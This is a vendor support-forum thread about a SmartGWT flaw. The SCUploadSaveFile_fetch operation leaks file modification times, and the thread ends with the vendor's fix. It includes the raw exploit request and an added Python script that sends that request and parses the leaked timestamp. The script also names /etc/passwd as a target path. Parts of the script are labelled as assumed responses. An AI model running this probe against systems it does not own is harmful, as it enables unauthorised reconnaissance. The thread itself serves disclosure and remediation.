    SCUploadSaveFile datasource can be abused to check arbitrary server file existence

    Hello, we recently had a third party do a penetration test of our application, and they discovered that a fetch operation against the SCUploadSaveFile datasource can be manipulated such that it returns the last-modified timestamp of any file on the server. Since I don't use this feature of SmartGWT, is it possible to turn this off? I've noticed that this is part of the "system" data sources, and I'd prefer not to override those. The vulnerability can be reproduced with the following HTTP request.

    In this example, my WAR file is someWar, and my GWT app name is someApp (thus the URL /someWar/someApp). If C:\testFile.xml exists, it will return the modification time for that file. Framework versions are GWT 2.6.0 and SmartGWT-EE 4.1-2016-01-31:


    POST to path /someWar/someApp/sc/IDACall?isc_rpc=1&isc_v=v9.1p_2016-01-31&isc_xhr=1

    Request content
    Code:
    isc_tnum=36
    _transaction=<?xml version="1.0"?>
    <transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object">
        <transactionNum xsi:type="xsd:long">5</transactionNum>
        <operations xsi:type="xsd:List">
            <elem xsi:type="xsd:Object">
                <criteria>
                    <path>c:\testFile.xml</path>
                </criteria>
                <appID>builtinApplication</appID>
                <operation>SCUploadSaveFile_fetch</operation>
            </elem>
        </operations>
    </transaction>
    protocolVersion=1.0

    #2
    You should find that you cannot call this method unless the built-in RPC method "loadFile" is also enabled. "loadFile" is not enabled by default - see your server.properties file, in particular the setting RPCManager.enabledBuiltinMethods and documentation provided right next to this setting.

    If you've overridden the default and turned on the "loadFile" Built-in RPC, your deployment is indeed vulnerable, and not just to checking timestamps - "loadFile" can be used to load the actual content of arbitrary files. We would recommend reverting to the default settings the product ships with.

    See also the Tools Deployment topic for how to safely enable RPCs such as "loadFile", only for admin users.

    Comment


      #3
      Yeah I saw that setting, and tried it with both
      RPCManager.enabledBuiltinMethods:
      and
      RPCManager.enabledBuiltinMethods: false
      assuming I don't understand how to use it. Either way, calling this method returns the following:
      //isc_RPCResponseStart-->[{affectedRows:0,data:{lastChangeDate:1421989076000},invalidateCache:false,isDSResponse:true,operationType:"fetch",queueStatus:0,status:0}]//isc_RPCResponseEnd

      That "lastChangeDate" does actually line up with the last modified date on one of my system files.

      Comment
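To reproduce the probe from the first post against a deployment you own and tell from the reply whether it leaks, here is an added Python helper. It is not code from the original posts or from Isomorphic/SmartGWT: it builds the same _transaction body shown above, posts it to the IDACall endpoint, and parses the //isc_RPCResponseStart wrapper for a lastChangeDate. The base URL, the "no leak" sample reply and the error page are constructed assumptions (the real denial response may have a different shape), so the check only reports a leak when a lastChangeDate is actually present. The same script can be re-run after the February 10 nightly from post #5 to confirm that SCUploadSaveFile "fetch" no longer returns a timestamp once "loadFile" is disabled.

```python
"""Probe for the SCUploadSaveFile_fetch lastChangeDate leak discussed in this thread.

Added example, not part of the original post or of the SmartGWT product.
The request shape mirrors the one posted above; everything else (host names,
the non-leaking sample response, the error page) is constructed/assumed.
"""
import json
import re
import urllib.parse
import urllib.request
from typing import Optional
from xml.sax.saxutils import escape

# The IDACall response body wraps a JavaScript array between these markers.
RPC_WRAPPER = re.compile(r"//isc_RPCResponseStart-->(.*?)//isc_RPCResponseEnd", re.S)
# The array uses unquoted object keys, so it is not valid JSON as-is.
UNQUOTED_KEY = re.compile(r"([{,]\s*)([A-Za-z_]\w*)\s*:")


def build_transaction(path: str, transaction_num: int = 5) -> str:
    """Return the _transaction XML for an SCUploadSaveFile_fetch on `path`."""
    return (
        '<?xml version="1.0"?>'
        '<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object">'
        f'<transactionNum xsi:type="xsd:long">{transaction_num}</transactionNum>'
        '<operations xsi:type="xsd:List">'
        '<elem xsi:type="xsd:Object">'
        f'<criteria><path>{escape(path)}</path></criteria>'
        '<appID>builtinApplication</appID>'
        '<operation>SCUploadSaveFile_fetch</operation>'
        '</elem></operations></transaction>'
    )


def build_body(path: str, tnum: int = 36) -> str:
    """Form-encode the three fields the posted request carries."""
    return urllib.parse.urlencode({
        "isc_tnum": tnum,
        "_transaction": build_transaction(path),
        "protocolVersion": "1.0",
    })


def parse_last_change_date(response_text: str) -> Optional[int]:
    """Return the leaked lastChangeDate (epoch ms) or None if the reply has none."""
    m = RPC_WRAPPER.search(response_text)
    if not m:
        return None  # error page, login redirect, or some other non-RPC reply
    # Quote bare keys so the JS object literal becomes JSON. Good enough for the
    # flat DSResponse shape seen here; a string value containing ",word:" would
    # confuse it.
    payload = UNQUOTED_KEY.sub(r'\1"\2":', m.group(1))
    try:
        responses = json.loads(payload)
    except json.JSONDecodeError:
        return None
    for resp in responses:
        data = resp.get("data") if isinstance(resp, dict) else None
        if isinstance(data, dict) and "lastChangeDate" in data:
            return int(data["lastChangeDate"])
    return None


def probe(base_url: str, path: str, timeout: float = 10.0) -> Optional[int]:
    """POST the probe to a deployment you own and return any leaked timestamp.

    base_url is assumed to look like https://host/someWar/someApp (the WAR and
    app names from the post); isc_v is the build string from the posted request.
    """
    url = base_url.rstrip("/") + "/sc/IDACall?isc_rpc=1&isc_v=v9.1p_2016-01-31&isc_xhr=1"
    req = urllib.request.Request(
        url,
        data=build_body(path).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_last_change_date(resp.read().decode("utf-8", "replace"))


# Constructed samples: the first is the response quoted in post #3; the second
# and third are assumed shapes of a non-leaking reply and of an HTTP error page,
# not captured from a real server.
SAMPLE_LEAK = (
    "//isc_RPCResponseStart-->[{affectedRows:0,data:{lastChangeDate:1421989076000},"
    'invalidateCache:false,isDSResponse:true,operationType:"fetch",queueStatus:0,status:0}]'
    "//isc_RPCResponseEnd"
)
SAMPLE_NO_LEAK = (
    "//isc_RPCResponseStart-->[{data:null,invalidateCache:false,isDSResponse:true,"
    'operationType:"fetch",queueStatus:0,status:-1}]//isc_RPCResponseEnd'
)
SAMPLE_ERROR_PAGE = "<html><body>403 Forbidden</body></html>"

if __name__ == "__main__":
    for name, sample in [("leak", SAMPLE_LEAK), ("no leak", SAMPLE_NO_LEAK), ("error", SAMPLE_ERROR_PAGE)]:
        print(name, "->", parse_last_change_date(sample))
    # Against a deployment you own:
    # print(probe("https://host/someWar/someApp", r"c:\testFile.xml"))
```

A timestamp coming back for a path the application never serves (C:\testFile.xml, /etc/passwd and the like) is the leak; None for a path that you know exists means the operation is no longer reachable. Probe only hosts you are authorized to test.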


        #4
        The enabledBuiltinMethods setting actually only controls SCUploadSaveFile from version 5.0 onward. We're checking on the appropriate setting in the older 4.1 version. In the meantime, removing the .ds.xml file from your production deployment would solve the problem - the operations provided by SCUploadSaveFile are only used by Visual Builder and Reify.

        Comment


          #5
          We've made a change to address this issue in the 4.1 version. Now, disabling "loadFile" also disables SCUploadSaveFile "fetch".
          Please try the next nightly build, dated February 10.

          Regards
          Isomorphic Software

          Comment


            #6
            Fantastic, thank you!

            Comment
